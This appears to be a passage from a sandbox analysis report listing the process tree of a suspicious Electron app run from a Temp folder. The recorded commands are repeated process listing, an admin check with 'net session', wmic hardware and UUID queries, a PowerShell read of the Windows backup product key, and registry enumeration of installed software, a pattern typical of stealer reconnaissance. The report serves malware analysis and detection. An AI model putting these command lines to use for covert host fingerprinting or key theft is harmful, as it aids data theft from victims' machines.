    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6432
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6456
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6464
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6488
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6516
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6532
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6552
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6580
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6592
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6600
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6612
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6632
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6648
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6672
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6700
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6716
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6736
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6752
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6772
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6800
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6820
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6848
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6880
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6900
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6916
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6940
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "net session"
    3⤵
    PID:6984
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:7420
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\bind\main.exe"
    3⤵
    PID:7004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:7036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:7200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
    3⤵
    PID:7052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic OS get caption, osarchitecture
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5316
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:5860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
    3⤵
    PID:6072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name
      4⤵
      PID:7228
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:6036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
    3⤵
    PID:4308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:6284
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:6628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:5996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
    3⤵
    PID:5520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
      4⤵
      PID:6320
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1524 get ExecutablePath"
    3⤵
    PID:6164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=1524 get ExecutablePath
      4⤵
      PID:7172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:7992
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:6372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:6352
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:6240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
    3⤵
    PID:3760
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
      4⤵
      PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
    3⤵
    PID:5644
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
      4⤵
      PID:6740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
    3⤵
    PID:6520
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
      4⤵
      PID:7512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
    3⤵
    PID:8156
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
      4⤵
      PID:7276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
    3⤵
    PID:7128
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
      4⤵
      PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
    3⤵
    PID:7372
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
      4⤵
      PID:7708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
    3⤵
    PID:6760
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
      4⤵
      PID:7544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
    3⤵
    PID:6280
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
      4⤵
      PID:6600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
    3⤵
    PID:7272
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
      4⤵
      PID:7916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
    3⤵
    PID:6608
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
      4⤵
      PID:6232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
    3⤵
    PID:8164
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
      4⤵
      PID:6188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""
    3⤵
    PID:8124
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
      4⤵
      PID:7684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
    3⤵
    PID:6908
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
      4⤵
      PID:7824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
    3⤵
    PID:7612
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
      4⤵
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
    3⤵
    PID:5320
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
      4⤵
      PID:6612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
    3⤵
    PID:7960
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
      4⤵
      PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
    3⤵
    PID:8080
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
      4⤵
      PID:7300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
    3⤵
    PID:6304
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
      4⤵
      PID:5356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
    3⤵
    PID:7568
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
      4⤵
      PID:7912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
    3⤵
    PID:8024
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
      4⤵
      PID:7220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
    3⤵
    PID:5956
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
      4⤵
      PID:7252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
    3⤵
    PID:6572
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
      4⤵
      PID:7768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
    3⤵
    PID:6500
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
      4⤵
      PID:7688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
    3⤵
    PID:6892
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
      4⤵
      PID:7720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
    3⤵
    PID:4584
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
      4⤵
      PID:4152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
    3⤵
    PID:6484
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
      4⤵
      PID:7784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
    3⤵
    PID:2776
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
      4⤵
      PID:7748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
    3⤵
    PID:7868
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
      4⤵
      PID:796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
    3⤵
    PID:4800
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
      4⤵
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""
    3⤵
    PID:4544
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"
      4⤵
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
    3⤵
    PID:4080
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
      4⤵
      PID:1240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
    3⤵
    PID:4020
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
      4⤵
      PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
    3⤵
    PID:5028
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
      4⤵
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
    3⤵
    PID:1268
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
      4⤵
      PID:2380
